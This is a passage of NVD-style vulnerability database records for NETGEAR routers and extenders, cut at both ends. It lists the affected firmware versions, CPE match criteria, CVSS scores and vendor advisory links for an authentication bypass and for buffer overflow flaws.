"matchCriteriaId": "59C6F6E4-C411-486E-BDBF-75F0ABEF5112",
"versionEndExcluding": "1.0.1.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B9FA153F-24E0-47DE-94B4-10F51999BCF0",
"versionEndExcluding": "1.0.3.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "CC34CE8E-8DB9-4A15-80D8-EB663482A892",
"versionEndExcluding": "1.0.2.74",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr2000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C9A59121-B980-46B4-ABB8-13DEAE8F3923",
"versionEndExcluding": "1.2.0.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr2000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C5085749-A0E2-448D-B26B-7E25400F1C12",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by authentication bypass. This affects EX3700 before 1.0.0.64, EX3800 before 1.0.0.64, EX6120 before 1.0.0.32, EX6130 before 1.0.0.16, R6300v2 before 1.0.4.12, R6700 before 1.0.1.26, R6900 before 1.0.1.22, R7000 before 1.0.9.6, R7300DST before 1.0.0.52, R7900 before 1.0.1.12, R8000 before 1.0.3.24, R8500 before 1.0.2.74, and WNR2000v2 before 1.2.0.8."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por una omisi\u00f3n de autenticaci\u00f3n. Esto afecta a EX3700 versiones anteriores a la versi\u00f3n 1.0.0.64, EX3800 versiones anteriores a la versi\u00f3n 1.0.0.64, EX6120 versiones anteriores a 1.0.0.32, EX6130 versiones anteriores a la versi\u00f3n 1.0.0.16, R6300v2 versiones anteriores a 1.0.4.12, R6700 versiones anteriores a 1.0.1.26, R6900 versiones anteriores a 1.0.1.22, R7000 versiones anteriores a 1.0.9.6, R7300DST versiones anteriores a 1.0.0.52, R7900 versiones anteriores a 1.0.1.12, R8000 versiones anteriores a 1.0.3.24, R8500 versiones anteriores a 1.0.2.74 y WNR2000v2 versiones anteriores a 1.2.0.8."
}
],
"id": "CVE-2017-18772",
"lastModified": "2024-11-21T03:20:52.860",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.8,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:A/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 6.5,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-22T15:15:11.800",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000051471/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-and-Extenders-PSV-2017-0424"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000051471/Security-Advisory-for-Authentication-Bypass-on-Some-Routers-and-Extenders-PSV-2017-0424"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-287"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2020-04-16 19:15
Modified
2024-11-21 04:39
Severity ?
Summary
Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6220 before 1.0.0.52, D6400 before 1.0.0.86, D7000v2 before 1.0.0.53, D8500 before 1.0.3.44, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.109, R6250 before 1.0.4.34, R6300v2 before 1.0.4.32, R6400 before 1.0.1.46, R6400v2 before 1.0.2.62, R6700 before 1.0.2.6, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R7000 before 1.0.9.60, R7000P before 1.3.1.64, R7100LG before 1.0.0.52, R7300DST before 1.0.0.70, R7900 before 1.0.3.8, R7900P before 1.4.1.30, R8000 before 1.0.4.28, R8000P before 1.4.1.30, R8300 before 1.0.2.128, R8500 before 1.0.2.128, WNDR3400v3 before 1.0.1.24, and WNR3500Lv2 before 1.2.0.56.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4B185396-F010-45EF-B533-0AD61C095273",
"versionEndExcluding": "1.0.0.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "58E68C65-9685-40E8-8D51-6C922232168B",
"versionEndExcluding": "1.0.0.86",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7D30939B-86E3-4C78-9B05-686B4994C8B9",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "71A9577C-914A-4B23-BEF7-03DFBD634F5A",
"versionEndExcluding": "1.0.0.53",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d7000:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "D8780623-F362-4FA5-8B33-37E9CB3FEE12",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C329B7CB-1281-480D-BDDB-E222044D715E",
"versionEndExcluding": "1.0.3.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "814A0114-9A1D-4EA0-9AF4-6968514E4F01",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgn2200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "91EFE482-AAF5-4B46-9658-94B1072F3CD2",
"versionEndExcluding": "1.0.0.110",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgn2200:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "099184A0-F1C6-4C3F-9C3B-F0B9AC0D4D14",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:dgnd2200b_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "025234D6-A814-4669-9814-3631B54B753D",
"versionEndExcluding": "1.0.0.109",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:dgnd2200b:v4:*:*:*:*:*:*:*",
"matchCriteriaId": "D6EBFFCE-0D9E-4383-8CD6-3DC4D2412446",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E1DD1F7D-7556-4B95-A33F-E389948D20AA",
"versionEndExcluding": "1.0.4.34",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E997B769-B2F7-4BB5-A834-96A68EF842BA",
"versionEndExcluding": "1.0.4.32",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8BF91E85-8869-4421-8748-C7856C06435B",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "91532716-831D-401C-8707-86785F0A4E16",
"versionEndExcluding": "1.0.2.62",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "AD6FD0FE-1431-4E39-8D07-B4AFE5BDB1B6",
"versionEndExcluding": "1.0.2.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3E921ACD-4ED9-4FFD-AF96-F2E1D75F8C96",
"versionEndExcluding": "1.0.2.4",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "103B19E9-C72D-43C2-8369-1C425E9B9AC7",
"versionEndExcluding": "1.3.1.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2464BFFA-401B-48F9-B326-15F306F927FF",
"versionEndExcluding": "1.0.9.60",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E23D8A41-75D8-4067-A961-3B81276527A8",
"versionEndExcluding": "1.3.1.64",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8F363604-1D1A-4FA2-9EE4-B19645DD35B6",
"versionEndExcluding": "1.0.0.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F168C3F8-F77C-4918-A752-9A04CED2349E",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "845CF217-8361-4D5B-811D-B9CEB68880CB",
"versionEndExcluding": "1.0.3.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8BBB7E16-D31C-49EA-9D82-D3BACED95441",
"versionEndExcluding": "1.4.1.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "98FAEBDA-5FBA-402D-9BA1-25E5DF4EF55F",
"versionEndExcluding": "1.0.4.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "6791754E-E5F9-42EA-AFDA-F93E8227A7C8",
"versionEndExcluding": "1.4.1.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "FD0AB065-3152-492B-A66D-2BCCA1E3B1DA",
"versionEndExcluding": "1.0.2.128",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "28EC6190-68BC-4D9A-9973-01935EB3472F",
"versionEndExcluding": "1.0.2.128",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A8D88D16-F42A-412D-81A6-BD6CA2E08595",
"versionEndExcluding": "1.0.1.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0960178A-5EC8-4C53-8AA2-060025782DC0",
"versionEndExcluding": "1.2.0.56",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a buffer overflow by an authenticated user. This affects D6220 before 1.0.0.52, D6400 before 1.0.0.86, D7000v2 before 1.0.0.53, D8500 before 1.0.3.44, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.109, R6250 before 1.0.4.34, R6300v2 before 1.0.4.32, R6400 before 1.0.1.46, R6400v2 before 1.0.2.62, R6700 before 1.0.2.6, R6900 before 1.0.2.4, R6900P before 1.3.1.64, R7000 before 1.0.9.60, R7000P before 1.3.1.64, R7100LG before 1.0.0.52, R7300DST before 1.0.0.70, R7900 before 1.0.3.8, R7900P before 1.4.1.30, R8000 before 1.0.4.28, R8000P before 1.4.1.30, R8300 before 1.0.2.128, R8500 before 1.0.2.128, WNDR3400v3 before 1.0.1.24, and WNR3500Lv2 before 1.2.0.56."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por un desbordamiento del b\u00fafer por parte de un usuario autenticado. Esto afecta a D6220 versiones anteriores a 1.0.0.52, D6400 versiones anteriores a 1.0.0.86, D7000v2 versiones anteriores a 1.0.0.53, D8500 versiones anteriores a 1.0.3.44, DGN2200v4 versiones anteriores a 1.0.0.110, DGND2200Bv4 versiones anteriores a 1.0.0. 109, R6250 versiones anteriores a 1.0.4.34, R6300v2 versiones anteriores a 1.0.4.32, R6400 versiones anteriores a 1.0.1.46, R6400v2 versiones anteriores a 1.0.2.62, R6700 versiones anteriores a 1.0.2.6, R6900 versiones anteriores a 1.0.2.4, R6900P versiones anteriores a 1. 3.1.64, R7000 versiones anteriores a 1.0.9.60, R7000P versiones anteriores a 1.3.1.64, R7100LG versiones anteriores a 1.0.0.52, R7300DST versiones anteriores a 1.0.0.70, R7900 versiones anteriores a 1.0.3.8, R7900P versiones anteriores a 1.4.1. 30, R8000 versiones anteriores a 1.0.4.28, R8000P versiones anteriores a 1.4.1.30, R8300 versiones anteriores a 1.0.2.128, R8500 versiones anteriores a 1.0.2.128, WNDR3400v3 versiones anteriores a 1.0.1.24, y WNR3500Lv2 versiones anteriores a 1.2.0.56."
}
],
"id": "CVE-2019-20712",
"lastModified": "2024-11-21T04:39:08.740",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 5.2,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:A/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 5.1,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
"exploitabilityScore": 0.9,
"impactScore": 5.9,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "ADJACENT_NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-16T19:15:24.667",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000061216/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-and-Gateways-PSV-2018-0323"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000061216/Security-Advisory-for-Post-Authentication-Buffer-Overflow-on-Some-Routers-and-Gateways-PSV-2018-0323"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-120"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2021-12-26 01:15
Modified
2024-11-21 06:32
Severity ?
4.5 (Medium) - CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H
4.5 (Medium) - CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H
4.5 (Medium) - CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H
Summary
Certain NETGEAR devices are affected by a stack-based buffer overflow by an authenticated user. This affects CBR750 before 3.2.18.2, D6220 before 1.0.0.68, D6400 before 1.0.0.102, D8500 before 1.0.3.60, LAX20 before 1.1.6.28, MK62 before 1.0.6.116, MR60 before 1.0.6.116, MS60 before 1.0.6.116, R6300v2 before 1.0.4.50, R6400 before 1.0.1.68, R6400v2 before 1.0.4.118, R6700v3 before 1.0.4.118, R6900P before 1.3.3.140, R7000 before 1.0.11.116, R7000P before 1.3.3.140, R7850 before 1.0.5.68, R7900 before 1.0.4.38, R7900P before 1.4.2.84, R7960P before 1.4.2.84, R8000 before 1.0.4.68, R8000P before 1.4.2.84, RAX15 before 1.0.3.96, RAX20 before 1.0.3.96, RAX200 before 1.0.4.120, RAX35v2 before 1.0.3.96, RAX40v2 before 1.0.3.96, RAX43 before 1.0.3.96, RAX45 before 1.0.3.96, RAX50 before 1.0.3.96, RAX75 before 1.0.4.120, RAX80 before 1.0.4.120, RBK752 before 3.2.17.12, RBK852 before 3.2.17.12, RBR750 before 3.2.17.12, RBR850 before 3.2.17.12, RBS750 before 3.2.17.12, RBS850 before 3.2.17.12, RS400 before 1.5.1.80, and XR1000 before 1.0.0.58.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:cbr750_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DCDDC785-6FEC-4D94-86D1-8E55FB0CA6C1",
"versionEndExcluding": "3.2.18.2",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:cbr750:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CBD14EFC-C6EF-485B-A594-73B8525704A5",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6220_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "ADF65DC4-51D5-4C38-B28D-7EA93B1734A3",
"versionEndExcluding": "1.0.0.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:d6220:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3EEA190-2E9C-4586-BF81-B115532FBA23",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:d6400_firmware:*:*:*:*:*:*:*:*",
